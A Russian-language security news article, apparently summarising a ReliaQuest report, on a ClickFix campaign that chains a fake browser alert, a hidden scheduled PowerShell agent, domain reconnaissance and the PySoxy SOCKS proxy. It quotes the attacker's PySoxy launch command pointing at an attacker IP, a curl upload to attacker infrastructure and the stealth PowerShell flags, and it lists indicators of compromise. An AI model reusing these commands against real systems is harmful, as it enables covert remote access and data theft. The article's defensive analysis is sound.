ClickFix эволюционирует: атакующие комбинируют социальную инженерию со старым прокси PySoxy для закрепления в сетях

ClickFix - это техника социальной инженерии, когда жертву обманным путём заставляют скопировать и выполнить вредоносную команду в PowerShell или командной строке. Раньше такие атаки заканчивались однократным подключением к инфраструктуре злоумышленника. Теперь же после первого клика запускается автоматическая цепочка: создаётся задача в планировщике, которая каждые 40 минут перезапускает скрипт, устанавливается постоянный канал управления, а затем загружается PySoxy - старый, десятилетней давности открытый прокси-сервер на Python, работающий по протоколу SOCKS5.

Проблема в том, что блокировка одного канала связи не останавливает вторжение. В расследованном инциденте средства защиты перекрыли оба исходящих соединения, которые пытался установить атакующий. Но задача в планировщике продолжала попытки перезапуска в течение нескольких часов. Это означает, что один щелчок мыши может оставить злоумышленникам запасной путь обратно в систему.

Всё началось с того, что пользователь зашёл на скомпрометированный сайт, который показал подделное уведомление - типичный приём ClickFix. Жертва скопировала и запустила обфусцированную команду PowerShell. Далее происходит несколько этапов.

Сначала загрузчик (stager) связывается с сервером атакующего, скачивает следующий этап и выполняет его в памяти, не записывая на диск. Затем злоумышленник создаёт задачу в планировщике Windows, которая запускает скрипт из папки C:\ProgramData каждые 40 минут. Команда использует стандартные флаги скрытного выполнения: -NoProfile, -ExecutionPolicy Bypass, -WindowStyle Hidden. Даже если первоначальный процесс завершится, планировщик восстановит его без участия пользователя.

Сам скрипт PowerShell оказался не просто загрузчиком, а полноценным агентом удалённого управления. Он опрашивал сервер управления каждые три секунды, получал команды, выполнял их на хосте и отправлял результат обратно. Каждое подключение содержало уникальный идентификатор машины, что позволяло атакующему отслеживать скомпрометированные системы.

После установки канала управления злоумышленник провёл разведку: проверил членство в группах, определил роль хоста в домене, перечислил контроллеры домена с помощью утилиты nltest.exe. Это дало ему понимание привилегий, окружения и потенциальных целей для дальнейшего продвижения.

Следующий шаг - загрузка PySoxy. Атакующий сначала выгрузил на свою инфраструктуру локальный файл журнала с помощью команды curl -T, убедившись, что хост может связываться с промежуточным сервером. Затем оттуда же скачал скомпилированный байт-код Python в файл b64.pyc в папку C:\ProgramData\python. Команда запуска выглядела так: python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97. Использование аргументов -ssl, -remote_port и -remote_ip указывает на то, что PySoxy был настроен как зашифрованное прокси-соединение по порту 443.

PySoxy дал атакующему второй способ доступа, совершенно непохожий на первый. Вместо подозрительного PowerShell теперь шёл зашифрованный трафик через Python-процесс, который мог выглядеть как обычная сетевая активность. Более того, этот канал работал через отдельную инфраструктуру, что усложняет блокировку.

Отчёт ReliaQuest подчёркивает: заблокированный вызов не означает сдерживание. Средства защиты конечных точек могут перекрыть исходящее соединение, но оставить задачу в планировщике, скрипты и интерпретатор Python. Полное устранение требует удаления всех компонентов: задач, файлов PowerShell, рантайма Python и байт-кода.

В данном случае атакующий попытался установить два независимых пути: один через PowerShell-агент, перезапускаемый планировщиком, второй - через Python-прокси. Оба были заблокированы, но механизм персистентности продолжал попытки восстановления. Это главный вызов: локальный механизм может пережить первое блокирование и пытаться восстановить доступ снова и снова.

Кампании ClickFix, которые включают закрепление и дополнительные инструменты, следует рассматривать как активное расследование взлома, а не как изолированное событие выполнения пользователем. Командам реагирования необходимо изолировать хост, проверить задачи в планировщике, проанализировать артефакты Python и искать подозрительные командные строки с аргументами вроде -ssl, -remote_ip, -remote_port, а также выполнение .pyc-файлов.

Ещё одно важное наблюдение: данная цепочка операционно напоминает кампании SocGholish, которые также проходят путь от социальной инженерии через разведку домена и прокси-доступ к подготовке перед атакой программ-вымогателей. ClickFix-цепи, достигающие такой глубины постоэксплуатации, функционально находятся на том же этапе. Вполне вероятно, что группы, распространяющие вымогатели, начнут использовать ClickFix как эквивалентный источник начального доступа наряду с SocGholish и покупками у брокеров доступа.

В будущем эксперты ожидают, что операторы ClickFix продолжат экспериментировать с инструментарием постоэксплуатации за пределами PowerShell. Python, Node.js, PHP, Perl или встроенные среды сценариев Windows (например, cscript с VBScript) могут выполнять ту же роль. Использование старого открытого прокси PySoxy может оказаться лишь ранним примером более широкого тренда: атакующие комбинируют социальную инженерию с собственным интерпретатором (bring-your-own-interpreter), чтобы обходить сигнатурное обнаружение и создавать избыточные пути доступа, которые сложнее классифицировать и заблокировать.

IPv4

• 167.99.158.97
• 185.205.211.217
• 206.206.103.106
• 206.206.103.120

Domains

• abledom.net
• overlateise.com
• strapness.com